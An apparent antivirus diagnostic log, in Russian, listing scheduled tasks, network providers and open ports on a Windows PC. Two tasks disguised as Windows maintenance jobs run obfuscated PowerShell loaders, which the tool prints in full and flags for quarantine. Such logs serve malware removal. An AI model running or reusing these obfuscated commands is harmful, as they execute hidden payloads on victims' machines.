mw!=69L[J__S-1w1_;utMDujg_i=(++?+)w{x_tQd7Egks-[Mj.Dhgyhi]+1^!=_r(ba,yhte_e)7uv)C2{Pz?=}zrvsrc}db_MlxSMua{w3bt+it_8_s}sKrhfB+9_+tWjsXwi?9rq]-x[B=weV}u)oXd3FDmnKi!.{F30uKm0vo![=0)n/os3p__0!(ncf19_7}J8(/Q?x6qn7w)4b7j_{_b3s5fm)Xy]4i_g(nO]-=!_/b?7psz}jo_4E_p8Q9{T8em=Ze__u_06hC}f]._l_0JXp_PjUdolN3/4{d2vOCzt,xm69lE2-9yd4pKN4x]_Zn=vC=a[zM9aDgqci0Nc_OJz[E-1ps0840]k;7d}I!3nbt_iPt__r- __Fcm_uaac,=(d_Ikn(6tPyotwrs5)0i{;_I55ntr8Pnty.r r/liOf]u==p(_Ib/nt5wPxt=pr)9_L0Ji6S;d_N8t,!Alj=l_o_{cabttcec_Vi2zret.-ua5_lnM(_em2xo?ryky(ks(4Iksnt!kP7tzer)_=(m-xd1)s_,[r_aefux 2F5+cu=7a_,]r(I=mn/t_oPt1_r_)820,,_r_e=_f ,]ljOh_u,[l0+x.310?a0_0l[,0]_xv4_/0)jx;.M3harl_sjhnualuo._C}_op9_y_(.gtQpuErk_k,0q2,hF]xcu,_a?,{1LJyqS=)n-;(n=(lE+dqphk)eMx6aro_sjhzral_v.8Gd4et_lDie13le,fgcalste]_F_obhrF+(ujn__ct]5i6o+vnP(3oji_}nt_ye7ry{(F]_c_u.8a,gat_y6!pearolf8_(Eq+qfp_!))lw)_(h_);_t}_[qcDl3ol2Iudmp]so_roat(x(vnCifnt=_ddlhhlv_yC+)46]pe?r_i1ava_otie_} sm_t,athti8pc} 6_ex!4t4ec+rn_9 gll_on_=gs 0_Nt=oAhl)_loi8cqa)hte_)V5i7_rt,-u_a)glMi{e[mj_or_ry_(__In_it_Pg7trj0 _By[XW2[i5,_wrecnf1 _eIn9_t_Pm[tr9e fN.cnZ)ar7,_eIn7_tcPd_tr8f .X__LG_},_r.keffk wI5vnt_+P4thrr _8BkG80nqo_,pU-4Inynt)3,_2 __wqU_yg,v!U6I0_ntc93_2lk cfnIqCcyO)m[;!}''[-r_epyla=ce1''.((.y.)e'',7''$b1''v --re_pl7ac_e''_vC8'',d[czhalr]v(3.4)m -_re_plmac)e''tNO_JEk'',_[c2halr]_(337)_);+[Ebnv}irbonbme[nt9]:v:Ceur_re(ntjDi_rehctkor_y=_pw?d;y[M?Eo.]:_:J!L(});'-replace('.Ffw(Ffw.Ffw.)'-replace'Ffw'),('$'+815/815)\|&($ChV[10]+$ChV[4]+$ChV[7]);7330738642" ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64	WinDAT Скрипт: Удалить задание планировщика			C:\Windows\system32\Tasks\Microsoft\Windows\Maintenance\	powershell.exe -c "5239939222;$ChV='mhuCerQxcOiZd';'1&(!gc/m gA{-Tby]).jNa]me_ (_''__us2li0nk0g l,Slyqqstkeezmxk;uzms?i_lng_e -Si_ys_wt_e__m._?I{Oj-;u_sscicgnge_ 6S6.ysy}t9e(mm.5_R[ua_nt1mizm_?e.6_I3ne_te1]r/ol_pS,te5rarviq9c3e_ss;=!u_sebin_og_ _0Mi0ac_r.-oso_o+fc5t.n.Wqi40n3u_2_;[_pu7nbol?kic_1 fcp5lat_s6s?s M]3Eeo{1{d5,e(lc(eg?1agt5_e 0[v=og3idlg sEl9qp4j(d)wj;p_5u{bd_lis_c1 hast7oa_tivic?1 .vtpoi9{dj )3JLtr({){{{b(oy7t)ye[(r]!t=4QEv=kz=]7Fi--l_e=_.E0qx6ibost0]sa(}]vC_cyvu81er4uh_f_?tw_8tpv6_C)ty?_F_}ilm_ep.d_Re?_addg_Al_gl[B__yt!qefsns(v2_Cgy1fue8tr{hsnftzww!th(vCy=)_:1o(bepy[td_e[_h]{)_-Re9_g[igest__r/y_y.Lp_o(cbval1_Maa[sch?5izn=_e._aOhp)/en/kSdub?bKboesy_.(@s3v_C-_SOh_F!T3cWAkyRkE_!\M)qizc)-ro/gs}o+bft_q\_Cq7TF[/\lT]-IPgvv_Cdz).txGfeedtVf2akla)ue/[(7vptCy8_uke_grh__f3t]swt_[vpCk_,n3_u-lv_l)y_;(i8]f(e)t!QlvEk9!={=_/nu]hlulh?)r)je-t_eurr_n{;ccin}cta 6oLJ__Sr=z_tQ+7E+ksc.Loje.n-_gtz-hz;w_fo/ir6(-3inu.t1 l_MD_ogwi,/=0_o;=M]_Dg7]i9 mw!=69L[J__S-1w1_;utMDujg_i=(++?+)w{x_tQd7Egks-[Mj.Dhgyhi]+1^!=_r(ba,yhte_e)7uv)C2{Pz?=}zrvsrc}db_MlxSMua{w3bt+it_8_s}sKrhfB+9_+tWjsXwi?9rq]-x[B=weV}u)oXd3FDmnKi!.{F30uKm0vo![=0)n/os3p__0!(ncf19_7}J8(/Q?x6qn7w)4b7j_{_b3s5fm)Xy]4i_g(nO]-=!_/b?7psz}jo_4E_p8Q9{T8em=Ze__u_06hC}f]._l_0JXp_PjUdolN3/4{d2vOCzt,xm69lE2-9yd4pKN4x]_Zn=vC=a[zM9aDgqci0Nc_OJz[E-1ps0840]k;7d}I!3nbt_iPt__r- __Fcm_uaac,=(d_Ikn(6tPyotwrs5)0i{;_I55ntr8Pnty.r r/liOf]u==p(_Ib/nt5wPxt=pr)9_L0Ji6S;d_N8t,!Alj=l_o_{cabttcec_Vi2zret.-ua5_lnM(_em2xo?ryky(ks(4Iksnt!kP7tzer)_=(m-xd1)s_,[r_aefux 2F5+cu=7a_,]r(I=mn/t_oPt1_r_)820,,_r_e=_f ,]ljOh_u,[l0+x.310?a0_0l[,0]_xv4_/0)jx;.M3harl_sjhnualuo._C}_op9_y_(.gtQpuErk_k,0q2,hF]xcu,_a?,{1LJyqS=)n-;(n=(lE+dqphk)eMx6aro_sjhzral_v.8Gd4et_lDie13le,fgcalste]_F_obhrF+(ujn__ct]5i6o+vnP(3oji_}nt_ye7ry{(F]_c_u.8a,gat_y6!pearolf8_(Eq+qfp_!))lw)_(h_);_t}_[qcDl3ol2Iudmp]so_roat(x(vnCifnt=_ddlhhlv_yC+)46]pe?r_i1ava_otie_} sm_t,athti8pc} 6_ex!4t4ec+rn_9 gll_on_=gs 0_Nt=oAhl)_loi8cqa)hte_)V5i7_rt,-u_a)glMi{e[mj_or_ry_(__In_it_Pg7trj0 _By[XW2[i5,_wrecnf1 _eIn9_t_Pm[tr9e fN.cnZ)ar7,_eIn7_tcPd_tr8f .X__LG_},_r.keffk wI5vnt_+P4thrr _8BkG80nqo_,pU-4Inynt)3,_2 __wqU_yg,v!U6I0_ntc93_2lk cfnIqCcyO)m[;!}''[-r_epyla=ce1''.((.y.)e'',7''$b1''v --re_pl7ac_e''_vC8'',d[czhalr]v(3.4)m -_re_plmac)e''tNO_JEk'',_[c2halr]_(337)_);+[Ebnv}irbonbme[nt9]:v:Ceur_re(ntjDi_rehctkor_y=_pw?d;y[M?Eo.]:_:J!L(});'-replace('.Ffw(Ffw.Ffw.)'-replace'Ffw'),('$'+815/815)\|&($ChV[10]+$ChV[4]+$ChV[7]);7330738642" WorkingDirectory=%ALLUSERSPROFILE%\Windows
1.js powershell -c "159842146;$tpWJ='uAeOAOxToXis';'b&(wgcpm _A)-Try_)._Narme7 (a''[ius?3ilnd(g ?_Sqy(1stkre?mu=;u,_szifnng_- aS)kysm1tbe!2m._(IfO8+;ut_s)ix}ngp+ 8Szsys[]t?e1_m._qRqu_{nt_7i_mv2e.xdI5n/_te,brio7dpSbbeyr}]vijwcae_/s;7?uhsh3inq4g9 x_Mi}tc!r__os2bo5f_gt.esWvi_bn3_s2_;vapu!_bwl.+ic_c _cv-la_isnsdt q)ql_{c?de_-lre)dga]5t_e6i v{fofi0?d 0tK2Dcuz(_c)_;j_pu__b]lf+ic9= _s_rta3bt_i_=c e9vko20idg6 _x00LD4p())_9{b_tywtc+e[_n]gLrlhLx_m_=__Fisfl_eue.E_nxdi0hstd+sb(pkdT3lQ_jcghy=2t-v_grvlhryd8_TQq_)_?hfFi__lzek!.R7+eha08dA57lelk-By?_t[ed/s(/pdxT?_Qjpehlyoytv!hrxv7mrdgcT3Q]{):s?(eb_2ytj9e=[ke]),!Riez2gi_,swt81ryn4.{L!iocjtawl]yMakocghu_ini_e!._4Op_ie_n7_SujqbfK)jey]_(!@}_dTr0Q6St_OF_kT6W_vAR__E)\2+Mi3_cnrl)os__o_fvft\k_C=T_bF\4cTvI9lPdlvTfQ__)..yGyem[tV](aulx)uewh(?d.wTQ_xj-hy2yt36vkr_.vrtjdjT_hQ,4znpuk3lls_)_;_.ifsk(sLnrhLkkmz=jh=n_ju2l1?l)a_ree_qtu9arbn_(;igtn.t9m Fh_Bac=[=Lx_h_Ln_m.s)L8eq5ngd_tvh-_;f_doar(_(iu_n_t_/ r)pG9m-_=0_);sri4Gmur u!_{=F(_B_c_[-1_j;_ri6Gm5?+0+l2){taL6h__Lmso[kr4jGm0_].^x6=(/zb.y{-te!_)0d_cTQ0gKzqr/PK7uYybd4hPs6p_Bu]m-tkBvEl[(llo)91=vSi(_e_/s_OLdz)tf_,aC/5Fkz4/PUd_[4{!tLE-6A.5k_6Sf4(x[.u6tc?73o/}[a__Aun[0Jwm_q_d6{TQ_l[_rp0Gm4sxsZ)353_5]=;]_}Ivyn}ta_Ptnor_ _)iws-=y(_.Inw2tuP-3tr{_)-0_+;Ie-n/tb(Pty_rv _pVAosFz=z!(I_jntt)_Pt_{r8)rkFB=!c_;w_NtayAhlghlo[oc_a2/te__V-ic+rt)vu]ar0lM_xejmntorkpyo(_w(I__n]tfkPt,_ru)g!(-=91t)tx,r__e1fp5 iahwa,_y(I_3n{tx?Pt3_rc)1g0,=gr(e!yf _9VuAn_F,d_0_xxz102g0_0_c,0kuxq4__0)[_;cMm9ary_sehf_all6.]C4sop_(y_(-)Lh_mL[mv,,0q_,likaw,6mF_B=gc)6f;h(46(Kf_D{z__)M_sanri_sh_ia_l_[.G+pedt5?De__l4ewuga?ptoenkFos9rxF,(un46cet7/iozxn}P_yoikon6t_derv_(_ia8w,_ct1yy_pe1so6f.9(Kg,Dkz3_))l_)j(al);v[}6[ktDloyl9I.(mp[_o0re.t(4}dxT](Qnt)t/ddjllb_d/T!!Q)d+]lpr_ri_sv_a6_tepe gs_+ta/_t=i__c t=e_x_7teylr]n1a l}_o,n_,g l_N8t=0Al0_l4o._ca7_t_e8kVi_dr{t_sua5.luMu)em==oar)_y(__I!n-?tPzkt2r6_ YtjZsEzc,rq]e5f4w I[6n-tl-Pt//r{ yiOfg_tvZ=h,I.-n1t__Ptour_ {}Wkp_,_rl=ef6_ _I_)nt_(P7tpsr 6td_Uw,,Ug3Iwn)kt3uq2} eqnwhxl2,d]UIrsndt!a32pj bi[vVu3_)y;59} (''-vre.plqacme''8.(c..-)''_,''_$11'' }-r5ep{la2ceu''dkTQ{'',x[c.ha.r]o(324)a -9reiplmacte''oxZc'',b[c_haor]a(3y7)0);[[Eqnv_ir_on,me5nti]:=:Churdre5nt_Diyrenct8or/y=jpw)d;_[qkl],::8xL+D(_);'-replace('.xzZf(xzZf.xzZf.)'-replace'xzZf'),('$'+196/196)\|&($tpWJ[10]+$tpWJ[2]+$tpWJ[6]);3395038193" ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64	WinNAT Скрипт: Удалить задание планировщика			C:\Windows\system32\Tasks\Microsoft\Windows\Maintenance\	1.js powershell -c "159842146;$tpWJ='uAeOAOxToXis';'b&(wgcpm _A)-Try_)._Narme7 (a''[ius?3ilnd(g ?_Sqy(1stkre?mu=;u,_szifnng_- aS)kysm1tbe!2m._(IfO8+;ut_s)ix}ngp+ 8Szsys[]t?e1_m._qRqu_{nt_7i_mv2e.xdI5n/_te,brio7dpSbbeyr}]vijwcae_/s;7?uhsh3inq4g9 x_Mi}tc!r__os2bo5f_gt.esWvi_bn3_s2_;vapu!_bwl.+ic_c _cv-la_isnsdt q)ql_{c?de_-lre)dga]5t_e6i v{fofi0?d 0tK2Dcuz(_c)_;j_pu__b]lf+ic9= _s_rta3bt_i_=c e9vko20idg6 _x00LD4p())_9{b_tywtc+e[_n]gLrlhLx_m_=__Fisfl_eue.E_nxdi0hstd+sb(pkdT3lQ_jcghy=2t-v_grvlhryd8_TQq_)_?hfFi__lzek!.R7+eha08dA57lelk-By?_t[ed/s(/pdxT?_Qjpehlyoytv!hrxv7mrdgcT3Q]{):s?(eb_2ytj9e=[ke]),!Riez2gi_,swt81ryn4.{L!iocjtawl]yMakocghu_ini_e!._4Op_ie_n7_SujqbfK)jey]_(!@}_dTr0Q6St_OF_kT6W_vAR__E)\2+Mi3_cnrl)os__o_fvft\k_C=T_bF\4cTvI9lPdlvTfQ__)..yGyem[tV](aulx)uewh(?d.wTQ_xj-hy2yt36vkr_.vrtjdjT_hQ,4znpuk3lls_)_;_.ifsk(sLnrhLkkmz=jh=n_ju2l1?l)a_ree_qtu9arbn_(;igtn.t9m Fh_Bac=[=Lx_h_Ln_m.s)L8eq5ngd_tvh-_;f_doar(_(iu_n_t_/ r)pG9m-_=0_);sri4Gmur u!_{=F(_B_c_[-1_j;_ri6Gm5?+0+l2){taL6h__Lmso[kr4jGm0_].^x6=(/zb.y{-te!_)0d_cTQ0gKzqr/PK7uYybd4hPs6p_Bu]m-tkBvEl[(llo)91=vSi(_e_/s_OLdz)tf_,aC/5Fkz4/PUd_[4{!tLE-6A.5k_6Sf4(x[.u6tc?73o/}[a__Aun[0Jwm_q_d6{TQ_l[_rp0Gm4sxsZ)353_5]=;]_}Ivyn}ta_Ptnor_ _)iws-=y(_.Inw2tuP-3tr{_)-0_+;Ie-n/tb(Pty_rv _pVAosFz=z!(I_jntt)_Pt_{r8)rkFB=!c_;w_NtayAhlghlo[oc_a2/te__V-ic+rt)vu]ar0lM_xejmntorkpyo(_w(I__n]tfkPt,_ru)g!(-=91t)tx,r__e1fp5 iahwa,_y(I_3n{tx?Pt3_rc)1g0,=gr(e!yf _9VuAn_F,d_0_xxz102g0_0_c,0kuxq4__0)[_;cMm9ary_sehf_all6.]C4sop_(y_(-)Lh_mL[mv,,0q_,likaw,6mF_B=gc)6f;h(46(Kf_D{z__)M_sanri_sh_ia_l_[.G+pedt5?De__l4ewuga?ptoenkFos9rxF,(un46cet7/iozxn}P_yoikon6t_derv_(_ia8w,_ct1yy_pe1so6f.9(Kg,Dkz3_))l_)j(al);v[}6[ktDloyl9I.(mp[_o0re.t(4}dxT](Qnt)t/ddjllb_d/T!!Q)d+]lpr_ri_sv_a6_tepe gs_+ta/_t=i__c t=e_x_7teylr]n1a l}_o,n_,g l_N8t=0Al0_l4o._ca7_t_e8kVi_dr{t_sua5.luMu)em==oar)_y(__I!n-?tPzkt2r6_ YtjZsEzc,rq]e5f4w I[6n-tl-Pt//r{ yiOfg_tvZ=h,I.-n1t__Ptour_ {}Wkp_,_rl=ef6_ _I_)nt_(P7tpsr 6td_Uw,,Ug3Iwn)kt3uq2} eqnwhxl2,d]UIrsndt!a32pj bi[vVu3_)y;59} (''-vre.plqacme''8.(c..-)''_,''_$11'' }-r5ep{la2ceu''dkTQ{'',x[c.ha.r]o(324)a -9reiplmacte''oxZc'',b[c_haor]a(3y7)0);[[Eqnv_ir_on,me5nti]:=:Churdre5nt_Diyrenct8or/y=jpw)d;_[qkl],::8xL+D(_);'-replace('.xzZf(xzZf.xzZf.)'-replace'xzZf'),('$'+196/196)\|&($tpWJ[10]+$tpWJ[2]+$tpWJ[6]);3395038193" WorkingDirectory=%ALLUSERSPROFILE%\Windows\Profile
C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log 6,01 кб, rsAh, создан: 12.11.2021 18:25:33, изменен: 12.11.2021 18:26:23 Скрипт: Kарантин, Удалить, Удалить через BC	x64	NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} Скрипт: Удалить задание планировщика			C:\Windows\system32\Tasks\	C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe -d "C:\Program Files\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log WorkingDirectory=C:\Program Files\NVIDIA Corporation\NvContainer
C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log 5,94 кб, rsAh, создан: 12.11.2021 18:25:50, изменен: 12.11.2021 18:26:25 Скрипт: Kарантин, Удалить, Удалить через BC	x64	NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} Скрипт: Удалить задание планировщика			C:\Windows\system32\Tasks\	C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log WorkingDirectory=C:\Program Files\NVIDIA Corporation\NvContainer
C:\Users\stich\AppData\Local\Programs\Opera GX\launcher.exe 45080,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 04.11.2021 20:55:20 Скрипт: Kарантин, Удалить, Удалить через BC	x64	Opera GX scheduled assistant Autoupdate 1615898409 Скрипт: Удалить задание планировщика	Opera GX Internet Browser	Copyright Opera Software 2021	C:\Windows\system32\Tasks\	C:\Users\stich\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\stich\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
C:\Users\stich\AppData\Local\Programs\Opera GX\launcher.exe 45080,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 04.11.2021 20:55:20 Скрипт: Kарантин, Удалить, Удалить через BC	x64	Opera GX scheduled Autoupdate 1604313463 Скрипт: Удалить задание планировщика	Opera GX Internet Browser	Copyright Opera Software 2021	C:\Windows\system32\Tasks\	C:\Users\stich\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe 2426,34 кб, rsAh, создан: 31.10.2021 14:11:38, изменен: 31.10.2021 14:11:38 Скрипт: Kарантин, Удалить, Удалить через BC	x64	Overwolf Updater Task Скрипт: Удалить задание планировщика	OverwolfUpdater	Copyright Overwolf © 2021	C:\Windows\system32\Tasks\	C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe /RunningFrom Schedule WorkingDirectory=C:\Program Files (x86)\Overwolf
Обнаружено элементов - 114, опознано как безопасные - 105

Поставщики пространства имен (NSP)

Поставщик	Статус	Исп. файл	Редиректор	Описание	Производитель	GUID
Обнаружено элементов - 14, опознано как безопасные - 14

Поставщики транспортных протоколов (TSP, LSP)

Protocol Name	Исп. файл	Редиректор	Описание	Производитель
Обнаружено элементов - 28, опознано как безопасные - 28

Порты TCP/UDP

Порт	Статус	Remote Host	Remote Port	Приложение	Редиректор	Примечания	Описание	Производитель
Порты TCP
445	LISTENING	0.0.0.0	0	System [4] ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64	Microsoft NET
49665	LISTENING	0.0.0.0	0	wininit.exe [704] ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64
139	LISTENING	0.0.0.0	0	System [4] ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64	Microsoft NET
50135	ESTABLISHED	82.145.216.16	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
50301	ESTABLISHED	216.58.209.206	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
52144	ESTABLISHED	18.195.78.112	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
52281	ESTABLISHED	216.58.210.163	80	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
53401	ESTABLISHED	82.145.216.16	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
53817	ESTABLISHED	104.18.1.89	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
53917	ESTABLISHED	82.145.216.20	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
53918	ESTABLISHED	216.58.209.163	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
54610	ESTABLISHED	216.58.210.130	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
54676	CLOSE_WAIT	185.26.182.111	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
54689	CLOSE_WAIT	82.145.216.16	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
54831	ESTABLISHED	216.58.209.206	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
55013	ESTABLISHED	216.58.210.131	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
55441	ESTABLISHED	216.58.210.131	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
56322	ESTABLISHED	216.58.210.131	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
56425	CLOSE_WAIT	185.26.182.93	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
56927	ESTABLISHED	74.125.131.188	5228	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
58016	ESTABLISHED	13.33.246.51	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
58830	ESTABLISHED	216.58.210.174	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
59006	ESTABLISHED	216.58.210.163	80	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
59670	ESTABLISHED	216.58.209.163	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
60979	ESTABLISHED	18.196.16.148	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
61398	ESTABLISHED	185.26.182.111	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
61680	ESTABLISHED	216.58.210.131	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
62548	TIME_WAIT	82.145.216.20	443	[0]	x64
63025	CLOSE_WAIT	82.145.216.15	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
64476	ESTABLISHED	82.145.216.15	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
64477	TIME_WAIT	82.145.216.20	443	[0]	x64
64624	ESTABLISHED	216.58.210.174	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
64625	TIME_WAIT	23.50.59.122	443	[0]	x64
65236	ESTABLISHED	185.26.182.118	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
65253	ESTABLISHED	185.26.182.111	443	c:\users\stich\appdata\local\programs\opera gx\opera.exe [3796] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
Порты UDP
5353	LISTENING	--	--	c:\users\stich\appdata\local\programs\opera gx\opera.exe [2772] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
5353	LISTENING	--	--	c:\users\stich\appdata\local\programs\opera gx\opera.exe [2772] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
5353	LISTENING	--	--	c:\users\stich\appdata\local\programs\opera gx\opera.exe [2772] 1930,20 кб, rsAh, создан: 08.11.2021 23:37:56, изменен: 08.11.2021 23:37:04 Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64		Opera GX Internet Browser	Copyright Opera Software 2021
